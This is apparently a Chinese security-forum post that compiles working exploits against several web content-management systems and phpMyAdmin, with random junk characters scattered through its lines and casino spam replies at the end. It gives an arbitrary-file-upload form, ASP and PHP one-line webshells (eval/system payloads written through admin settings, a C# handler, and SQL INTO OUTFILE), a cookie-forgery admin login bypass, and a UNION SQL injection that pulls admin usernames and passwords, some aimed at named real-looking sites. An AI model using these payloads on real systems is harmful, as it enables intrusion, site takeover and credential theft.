) [7 S. L! u3 f7 g---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ W' ~9 I& ?* D- m1 U8 h
- R2 @  j% Z, E6 m! s* fYxShop易想购物商城4.7.1版本任意文件上传漏洞+ b  H* H+ Q' l0 H6 }3 I$ {
8 [9 L' {4 [# g9 l9 U( M
http://xxoo.com/controls/fckedit ... aspx/connector.aspx9 h" w% ?, f2 [7 A% z0 ?4 Z, M, E9 _0 y
跳转到网站根目录上传任意文件。1 x8 m4 q; O6 i
如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
( P4 o, q1 y9 F* K. r" v5 U. Z<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
4 A, x  L2 Z0 o; E5 O9 OUpload a new file:<br>
+ L  `$ @! z* H<input type="file" name="NewFile" size="50"><br>4 r9 t7 g3 g# l8 M3 P1 y
<input id="btnUpload" type="submit" value="Upload">! D& Y! a7 T. h$ N
</form>. {7 R% ]/ S! X* r1 r/ u6 |) Q
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
. i& i" S! \  ^6 H' t, q+ F6 }+ ~8 X* [$ N& W2 `) Q
SDcms 后台拿webshell
% G( J  ~- H) l% ^% n
$ S3 i5 [  ^/ T1 K第一种方法:
  f! D7 B. J1 f! Z0 s6 S( Q进入后台-->系统管理-->系统设置-->系统设置->网站名称;
3 Z& H- |8 l5 d+ v1 i1 ^5 k把网站名称内容修改为   "%><%eval request("xxx")'    //密码为xxx
4 G( g3 J  E/ R: Z1 {用菜刀链接http://www.xxx.com/inc/const.asp  就搞定了。
' l) W' t! y# B; K* S7 N3 x第二种方法:
/ V! Y' u* t* Q3 q进入后台-->系统管理-->系统设置-->系统设置->上传设置;$ p$ v2 Z8 \4 ^( ^) m5 z
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!
8 v* z$ b4 H+ b& q1 w/ I7 J第三种方法:
& |# l2 ^0 }  A# x: E* M8 t进入后台-->界面管理-->模板文件管理-->创建文件
' q: |+ b2 K/ o文件名写入getshell.ashx
$ }& |. o- ^. F/ y9 K& E内容写入下面内容:0 d( e6 V( Q( G, _
/====================复制下面的=========================/
2 A& B  E; Z! v3 ~* b<%@ WebHandler Language="C#" Class="Handler" %>
; `" v% P! A( Q" z, O; Uusing System;4 s. J: @+ t+ N+ v: o
using System.Web;
/ u1 D  O# ?6 Z+ g# M( O+ B8 rusing System.IO;7 _! x. t" z: T4 S5 q4 k; P
public class Handler : IHttpHandler {5 |1 G: n' d, H; Q" d5 q
public void ProcessRequest (HttpContext context) {
: ~' ]* J! L2 P+ u2 ncontext.Response.ContentType = "text/plain";4 b% A. Z# K( y7 C  H; |* {/ }
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
: E: `+ z! c/ H# L5 Bfile1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
( q/ ]9 R/ H4 C' E$ U0 [file1.Flush();( K! I0 L# @0 R
file1.Close();
2 o5 a; E# R0 z5 b6 b! {. G4 H}9 `, q2 D6 Z" S- Y( C; Z$ g1 ?) c
public bool IsReusable {
, l* w. g- e& B* V0 j5 cget {
7 z( h* F/ k+ T0 x* M: D( Hreturn false;
# i, r2 y, d3 W( G2 P& X6 b5 g}5 g/ H: ~3 g! d; Q3 z
}" k9 |* B1 {+ O' e
}; u: U, m$ g% [1 c+ u9 e1 J5 I) }
/=============================================/
. n, r7 w8 _0 E4 n- g访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx2 @- \. j- u  a: R- H% o
会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接5 t6 ^' k- F2 z- E
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------# S) X' a1 O* j( y4 t

$ L% n$ D; F0 A6 n! GESCMS网站管理系统0day
6 m( g# u8 d7 {) T
. C$ u' Q4 Q7 \2 S后台登陆验证是通过admin/check.asp实现的
% g8 `7 }7 ]6 ^1 c8 j! f0 A( D
# ^* X2 Y: k: L. A0 y2 B0 v7 @首先我们打开http://target.com/admin/es_index.html
9 E5 j+ {- z: O然后在COOKIE结尾加上) o3 n% X) @, ]1 {
; ESCMS$_SP2=ES_admin=st0p;: E! g$ L0 V1 P, ]1 c/ S
修改,然后刷新
' w' T* O) D7 k进后台了嘎..
$ ~* S# m1 k9 Y  U- [4 h然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL% ]3 q" C( @. E3 U8 W  f

& s8 Z7 q, H- d1 I1 ^( D利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.: y- w3 p+ J" y  a* q, y$ U1 X5 F8 b
嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp
( @7 W: D* [# K5 r5 o存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
4 T4 p0 M1 T+ L4 v在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
- m0 d/ u  i$ X* F, V& I------------------------------------------------------------------------------------------------------------------------------------------------------------------------------  H5 G% l) V" u" T7 F" t# v
( |  H! i) r) p
宁志网站管理系统后台无验证漏洞及修复) _' F) ~: C$ b" s5 X6 u
- B4 W0 h# ^8 [" w3 L1 u! B
网上搜了一下,好像没有发布.如有雷同纯粹巧合!
: C) [. G- a% m0 X官方网站:www.ningzhi.net2 J. O2 |3 @2 T8 _6 z
学校网站管理系统 V.2011版本 4 y2 }" g2 Y$ v; E/ _" n0 [" R
http://down.chinaz.com/soft/29943.htm
* I4 E" S& Y3 k/ N8 ]7 V$ I( T其它版本(如:政府版等),自行下载.# f8 ?# u# m1 y1 r& U+ _! `0 @4 b
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
% E& f" ~# z# H9 G8 k4 G, Klogin.asp代码如下:7 O# X2 b# E. q& M6 C
<%  response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %> . }  x/ C# C- C1 A4 O5 P
manage.asp代码我就不帖出来了.反正也没验证.
. ]+ c( K6 o% O- ], }, A; ?只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
+ t) n% t7 t3 x- I$ R漏洞利用:# |1 ~1 v3 M0 E& ]+ q
直接访问http://www.0855.tv/admin/manage.asp
/ L" {' |. _3 ^: u! u& q; @数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
8 Y4 E3 [5 ]  T" e' p----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 P9 D6 {) t% K8 M
0 {+ E3 ~% j8 R6 ]  ~- p* }$ iphpmyadmin拿shell的四种方法总结及修复* h+ T( \8 u4 \5 t
+ M7 B7 A6 z+ [0 W+ R
方法一:
1 c! T/ l7 g2 U/ D3 t& ^6 y+ @CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
( A, g) G& |1 ]7 ~3 i& X7 S6 U1 t7 ~INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');" i  J1 P' u# |9 ]. m
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
; q! P9 d3 @7 _2 G----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
9 k6 F9 r, M3 G+ e$ o2 _    一句话连接密码:7on( l, X7 k, n/ \+ }
方法二:
5 k2 B9 r5 {6 V2 m- |; B" a读取文件内容:    select load_file('E:/xamp/www/s.php');! M9 R- T1 c7 r: l' D  }3 n
写一句话:    select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
" C; m( K$ Z: w+ C, }" @+ V4 Qcmd执行权限:    select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
; ]! V8 _3 z. @, V! X; R方法三:3 V- _- D1 I4 ~  p
JhackJ版本 PHPmyadmin拿shell
& z, l1 z' z, y' `$ oCreate TABLE study (cmd text NOT NULL);1 V: k  u6 w4 B" `  b: ~
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');5 H. |9 V7 I) L# L3 B! y
select cmd from study into outfile 'E:/wamp/www/7.php';+ @  R' a/ F. k  {
Drop TABLE IF EXISTS study;
8 A: X- ]4 J. f/ L- M0 N<?php eval($_POST[cmd])?>& ]8 i- V5 D1 S9 ]* ~! U  l% _
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。9 b- x% z3 ]. E
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 17 A3 p6 k0 l+ }: n
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
  F  r6 e6 k; b9 b6 O5 `6 E  GDROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
6 l8 Y3 D7 r) c& d6 m0 l8 x方法四:
& v3 `1 a$ W5 [" ~7 zselect load_file('E:/xamp/www/study.php');" f. Q# S. `& A, Y
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'* P$ ~9 s9 \; L8 J+ }$ t% j7 {( ]
然后访问网站目录:http://www.2cto.com/study.php?cmd=dir6 t" d+ Y! P- i) G- i9 x
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
! h# P5 n! M+ P! T, t- k* x  T
! c' F3 V  [4 C% q. W3 ]NO.001中学网站管理系统 Build 110628 注入漏洞
$ t$ n" |- w. ~# n$ h
" X  D" _7 D5 l: JNO.001中学网站管理系统功能模块:
+ v* T" A% I- Z4 }2 m* {1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等
9 A  E9 `- L/ c' y  g2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
; m7 }' \( T! \( N3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息) e+ u) P  w6 _( u
4.视频图片管理:一级分类,动态添加视频或者图片等信息
$ u7 K6 ]6 b* V5 x5.留言管理:对留言,修改,删除、回复等管理
& Z, a9 S  R/ i# Q6.校友频道:包括校友资料excel导出、管理等功能: f7 N0 f/ `# Y' o# W' R
7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页2 V+ X0 N; V& M- Q- d0 l3 n3 w' X  e
默认后台:admin/login.asp
% E( |5 r% R+ S  w官方演示:http://demo.001cms.net  B9 S3 j/ d5 k9 Z4 Y. b# M
源码下载地址:http://down.chinaz.com/soft/30187.htm- V% `4 ?3 N; m/ u# @
EXP:; S& o6 G; v0 p1 A  u/ \
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin& r0 M- [9 }9 [' m, S* \& c
测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
7 Q7 v- d/ w7 K/ ]% t5 v/ F; O9 |getshell:后台有备份,你懂的; \! T7 f& ?# l7 B  x& j+ S
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
2 d5 J4 n2 Y6 }, e0 D% M2 f-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
回复

使用道具 举报

沙发
匿名  发表于 2017-10-28 08:21:04
casino slots
online casino canada
new online casino
slot machines
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表